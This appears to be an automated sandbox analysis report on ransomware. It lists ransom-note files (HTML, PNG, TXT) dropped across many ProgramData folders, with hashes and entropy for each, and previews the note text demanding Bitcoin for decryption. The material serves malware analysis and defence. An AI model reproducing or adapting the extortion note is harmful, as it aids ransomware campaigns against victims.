                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\SoftLanding\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\WindowsAnalytics\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):542016
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCiCrCP
                  MD5:D6D12315C5392CB85E511974AE2BB7B4
                  SHA1:3B57D3392D90430B7B2423E566C4B3C64A3BA6FC
                  SHA-256:24E1941631CF2BD3A856BF94D4783325266D10E44EFD067B2E988780B8531916
                  SHA-512:9AEE5774C57BC36CA31E8053E17D287282C30B4077197D07A4EE91443C9DF31FA28AC93B5D5684E463647C8B317C15B8E2757D4C7AE38ABFE471CDB934FEF21F
                  Malicious:false
                  C:\ProgramData\Microsoft\Diagnosis\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):16776
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:384:kIi5PIi5PIi5PIi5PIi5PIi5PIi5PIi5u:U5/5/5/5/5/5/5/5u
                  MD5:6CD7A7401C4FCBB8B45A6183CC9EE413
                  SHA1:4088A6DF18463B9191A745D5ABEC9C184B2BDEEE
                  SHA-256:DE76D63BAB99866338E4226F46B77095EFBDAA53134D8A6FF6928C901A6966B9
                  SHA-512:06D6C4A3B6D94DC7C2DA12525DD9D81E66A48418DBE510FDDCA50085240176DCBE34FFE050AAF949ABA89164B1561508D83B6545106ACBDFB2C046081F632D01
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\INT\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\IdentityCRL\production\temp\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  C:\ProgramData\Microsoft\MF\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):62848
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:1536:ak3gnk3gnk3gnk3gnk3gnk3gnk3gnk3g+:akGkGkGkGkGkGkGkL
                  MD5:D8CEF461F8767D26948B8CD44CECF2E1
                  SHA1:537908FB65BAE7EB3C5917D9C5171D46522FEB18
                  SHA-256:017AD361A67C719BC8F05AB012CDC366912ABE6317853590F3979FA2C45D2E2D
                  SHA-512:778B6C27BF28FA4392F2C48FCE603FBF3192BFA548FA257AF0EAD3E9BA3FDA8A971EFC046CCF7DA389D78892E40313B4393A0469E0849880B9509570608C5235
                  Malicious:false
